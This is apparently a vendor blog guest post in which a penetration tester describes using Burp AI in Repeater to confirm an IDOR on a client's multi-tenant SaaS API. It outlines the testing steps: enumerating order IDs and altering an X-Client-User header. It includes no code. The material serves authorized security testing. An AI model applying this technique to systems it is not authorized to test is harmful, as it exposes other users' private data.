Hassan Ud-Deen |
22 January 2026 at 15:18 UTC
Note: This is a guest post by IT security consultant Adarsh Kumar.
I’ve been using Burp Suite day to day for years, so when Burp AI was introduced, I was curious how it would actually hold up during real engagements.
I’ve used it across live tests, not as a replacement for manual testing, but as a way to speed up exploration and surface ideas I might otherwise not have thought of until later. This post walks through one concrete example of how Burp AI fit into my Repeater workflow and where it genuinely helped.
Same workflow, better results
Repeater is where I spend most of my time during an engagement. A significant part of any pentest is replaying requests, changing one thing at a time, and watching how the app reacts. Fortunately, that’s also where Burp AI comes in.
I love that I’m able to invoke Burp AI directly from Repeater without breaking my normal workflow. I use it to suggest ideas, tweak payloads, and call out things I might otherwise miss after replaying the same request for the tenth time and starting to second-guess myself.
It feels like collaborating with another pentester. It doesn’t do the thinking for me, but it helps me move faster through the repetitive parts and get to the interesting behaviour sooner. This is exactly what happened in a recent client engagement during a time-boxed application test.
Quickly validating an IDOR on a multi-tenant SaaS app
The target was a SaaS platform used by multiple customer accounts, with user dashboards, a REST API, and token-based authentication. Access control issues were high impact in this context, as different customers’ data lived behind the same API surface.
I was testing the endpoint GET /api/orders/{orderId} in Repeater. The auth looked fine when I used my account, but the app returned different fields depending on the orderId.
I often come across leads like this, but there’s typically not enough time to pursue each and every one of them. I needed to quickly decide whether to dig deeper or move on to other areas.
I copied one of the successful requests into Repeater and highlighted the orderId path segment, along with a response field containing customerEmail.
From Repeater, I opened Burp AI and asked:
“Based on this request and response, can you suggest concrete tests to verify whether access controls are enforced correctly on this endpoint?”
Burp AI came back with a short, practical plan based on the selected request and response. It suggested trying IDs around the original value, testing different ID formats, tweaking a user-related header, and watching for response differences tied to other accounts.
It also gave me a list of different IDs to test and called out that some requests would probably return 404s, which helped separate normal behaviour from genuine access control problems.
Figure 1: Burp AI suggesting quick, targeted tests (example)
I then sent the AI-generated ID list straight back into Repeater, tweaked a header that the AI had flagged (X-Client-User) and replayed the requests. One of those requests returned a payload containing another user’s invoice details, which confirmed the IDOR.
Confirming this exploit quickly was key during the engagement. Once the IDOR was verified, I could immediately assess impact, expand testing to similar endpoints, and document a clear, reproducible proof of concept for the client.
Without that early confirmation, this could easily have turned into a longer manual exploration to get to the same result. Or even worse, I might’ve moved onto something else after a while, potentially leaving a high-severity bug behind in the process.
How Burp AI accelerates my Repeater workflow
Before: Repeater → manual guessing → grunt work to craft multiple variants → slow confirmation.
After: Repeater → quick AI prompt → get a short, sensible plan + a few concrete variants → push the ones that matter back into Repeater/Intruder → manual verification and exploitation.
For me, the net effect is less time on setup and more time thinking about what the responses actually mean, how far an issue goes, and how to explain it clearly to a client.
Thanks to Burp AI in Repeater, I get to spend more time on aspects of a test that matter because it will handle tasks like:
- Suggesting different payloads and test ideas in seconds.
- Flagging weird responses or patterns I might overlook.
- Helping mutate headers, parameters, or JSON fields quickly.
- Generating quick test sequences or lists of values for me to try.
- Giving plain-language explanations of unexpected server behavior.
- Letting me send AI-suggested requests straight back into Repeater or Intruder.
Taken together, this shaved a noticeable amount of time off the workflow. Burp AI probably saved me around 20 minutes on this single endpoint by surfacing payload variations, header mutations, and response patterns I would normally work through manually.
More importantly, it helped me reach a confident conclusion faster, which let me spend the remaining time testing related endpoints and validating overall impact.
For me, Burp AI speeds up the dull parts and gives me a second perspective when I’m stuck. It doesn’t replace the careful thinking a real pentester brings to chain issues together and judge the impact. What Burp AI gives me is cleaner iteration, more angles to try, and the odd suggestion that I hadn’t thought of after three cups of coffee.

